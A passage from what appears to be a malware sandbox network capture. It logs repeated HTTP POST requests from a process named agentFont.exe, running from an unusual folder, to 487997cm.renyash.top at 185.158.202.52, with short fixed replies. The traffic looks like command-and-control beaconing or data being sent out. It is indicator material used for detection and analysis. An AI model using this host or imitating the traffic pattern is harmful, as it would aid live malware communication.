                                                                                  Connection: Keep-Alive
Jan 1, 2025 11:27:54.441412926 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 11:27:54.571942091 CET | 308 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:51 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 152
                                                                                  Connection: keep-alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
45 | 192.168.2.4 | 49782 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 11:27:54.167470932 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
Jan 1, 2025 11:27:54.832112074 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 11:27:54.967744112 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:51 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
46 | 192.168.2.4 | 49784 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 11:27:55.098712921 CET | 302 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
Jan 1, 2025 11:27:55.735786915 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 11:27:55.870141983 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:52 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
47 | 192.168.2.4 | 49785 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 11:27:56.002521992 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
Jan 1, 2025 11:27:56.647931099 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 11:27:56.779812098 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:53 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
48 | 192.168.2.4 | 49786 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 11:27:56.939465046 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1040
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
Jan 1, 2025 11:27:57.580790043 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 11:27:57.706178904 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:54 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
49 | 192.168.2.4 | 49788 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 11:27:57.837312937 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
Jan 1, 2025 11:27:58.494329929 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 11:27:58.626174927 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:55 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
50 | 192.168.2.4 | 49794 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 11:27:58.778037071 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1040
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
Jan 1, 2025 11:27:59.415129900 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 11:27:59.542102098 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:55 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
51 | 192.168.2.4 | 49800 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 11:27:59.586780071 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1312
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
52 | 192.168.2.4 | 49804 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 11:27:59.661644936 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
Jan 1, 2025 11:28:00.318223953 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 11:28:00.450110912 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:56 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
53 | 192.168.2.4 | 49812 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 11:28:00.589643002 CET | 302 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
Jan 1, 2025 11:28:01.246711969 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 11:28:01.382337093 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:57 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
54 | 192.168.2.4 | 49813 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 11:28:01.726061106 CET | 302 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Host: 487997cm.renyash.top
Content-Length: 1044
Expect: 100-continue
Jan 1, 2025 11:28:02.080873966 CET | 1044 | OUT | (request body)
Jan 1, 2025 11:28:02.380166054 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 11:28:02.513839960 CET | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 01 Jan 2025 10:27:58 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 30 52 5e 57
Data Ascii: 0R^W


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
55 | 192.168.2.4 | 49824 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 11:28:02.646120071 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Host: 487997cm.renyash.top
Content-Length: 1044
Expect: 100-continue
Connection: Keep-Alive
Jan 1, 2025 11:28:03.003289938 CET | 1044 | OUT | (request body)
Jan 1, 2025 11:28:03.310502052 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 11:28:03.476268053 CET | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 01 Jan 2025 10:27:59 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 30 52 5e 57
Data Ascii: 0R^W


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
56 | 192.168.2.4 | 49830 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 11:28:03.610378027 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Host: 487997cm.renyash.top
Content-Length: 1044
Expect: 100-continue
Connection: Keep-Alive
Jan 1, 2025 11:28:03.955988884 CET | 1044 | OUT | (request body)
Jan 1, 2025 11:28:04.266632080 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 11:28:04.397981882 CET | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 01 Jan 2025 10:28:00 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 30 52 5e 57
Data Ascii: 0R^W


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
57 | 192.168.2.4 | 49835 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 11:28:04.627762079 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Host: 487997cm.renyash.top
Content-Length: 1044
Expect: 100-continue
Connection: Keep-Alive
Jan 1, 2025 11:28:04.987180948 CET | 1044 | OUT | (request body)
Jan 1, 2025 11:28:05.273174047 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 11:28:05.407845974 CET | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 01 Jan 2025 10:28:01 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 30 52 5e 57
Data Ascii: 0R^W


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
58 | 192.168.2.4 | 49837 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 11:28:04.665839911 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Host: 487997cm.renyash.top
Content-Length: 1340
Expect: 100-continue
Connection: Keep-Alive
Jan 1, 2025 11:28:05.019102097 CET | 1340 | OUT | (request body)
Jan 1, 2025 11:28:05.310483932 CET | 25 | IN | HTTP/1.1 100 Continue


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
59 | 192.168.2.4 | 49843 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 11:28:05.536519051 CET | 302 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Host: 487997cm.renyash.top
Content-Length: 1044
Expect: 100-continue
Jan 1, 2025 11:28:05.893378019 CET | 1044 | OUT | (request body)
Jan 1, 2025 11:28:06.210148096 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 11:28:06.341949940 CET | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 01 Jan 2025 10:28:02 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 30 52 5e 57
Data Ascii: 0R^W


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
60 | 192.168.2.4 | 49849 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 11:28:06.497102022 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Host: 487997cm.renyash.top
Content-Length: 1044
Expect: 100-continue
Connection: Keep-Alive
Jan 1, 2025 11:28:06.846554995 CET | 1044 | OUT | (request body)
Jan 1, 2025 11:28:07.134816885 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 11:28:07.266185045 CET | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 01 Jan 2025 10:28:03 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 30 52 5e 57
Data Ascii: 0R^W


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
61 | 192.168.2.4 | 49855 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 11:28:07.396924019 CET | 302 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Host: 487997cm.renyash.top
Content-Length: 1040
Expect: 100-continue
Jan 1, 2025 11:28:07.752861023 CET | 1040 | OUT | (request body)
Jan 1, 2025 11:28:08.046703100 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 11:28:08.175764084 CET | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 01 Jan 2025 10:28:04 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 30 52 5e 57
Data Ascii: 0R^W


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
62 | 192.168.2.4 | 49861 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 11:28:08.302346945 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Host: 487997cm.renyash.top
Content-Length: 1044
Expect: 100-continue
Connection: Keep-Alive
Jan 1, 2025 11:28:08.658973932 CET | 1044 | OUT | (request body)
Jan 1, 2025 11:28:08.938919067 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 11:28:09.065989017 CET | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 01 Jan 2025 10:28:05 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 30 52 5e 57
Data Ascii: 0R^W


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
63 | 192.168.2.4 | 49867 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 11:28:09.196548939 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Host: 487997cm.renyash.top
Content-Length: 1044
Expect: 100-continue
Connection: Keep-Alive
Jan 1, 2025 11:28:09.549660921 CET | 1044 | OUT | (request body)
Jan 1, 2025 11:28:09.871382952 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 11:28:10.004017115 CET | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 01 Jan 2025 10:28:06 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 30 52 5e 57
Data Ascii: 0R^W


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
64 | 192.168.2.4 | 49877 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 11:28:10.134582043 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Host: 487997cm.renyash.top
Content-Length: 1044
Expect: 100-continue
Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
65 | 192.168.2.4 | 49878 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 11:28:10.430921078 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Host: 487997cm.renyash.top
Content-Length: 1340
Expect: 100-continue
Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:10.784024000 CET | 1340 | OUT | Data (POST body)
                                                                                  Jan 1, 2025 11:28:11.078984022 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:11.207984924 CET | 308 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:07 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 152
                                                                                  Connection: keep-alive


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  66 | 192.168.2.4 | 49879 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:28:10.561175108 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:10.909013033 CET | 1044 | OUT | Data (POST body)
                                                                                  Jan 1, 2025 11:28:11.197736025 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:11.326051950 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:07 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  67 | 192.168.2.4 | 49886 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:28:11.477787971 CET | 302 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Jan 1, 2025 11:28:11.830944061 CET | 1044 | OUT | Data (POST body)
                                                                                  Jan 1, 2025 11:28:12.123584986 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:12.255809069 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:08 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  68 | 192.168.2.4 | 49895 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:28:12.383811951 CET | 302 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Jan 1, 2025 11:28:12.737112999 CET | 1044 | OUT | Data (POST body)
                                                                                  Jan 1, 2025 11:28:13.022958994 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:13.150635004 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:09 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  69 | 192.168.2.4 | 49902 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:28:13.293688059 CET | 302 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Jan 1, 2025 11:28:13.643456936 CET | 1044 | OUT | Data (POST body)
                                                                                  Jan 1, 2025 11:28:13.970870972 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:14.103729010 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:10 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  70 | 192.168.2.4 | 49908 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:28:14.225965977 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1040
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:14.580869913 CET | 1040 | OUT | Data (POST body)
                                                                                  Jan 1, 2025 11:28:14.862943888 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:14.990082979 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:11 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  71 | 192.168.2.4 | 49914 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:28:15.119556904 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
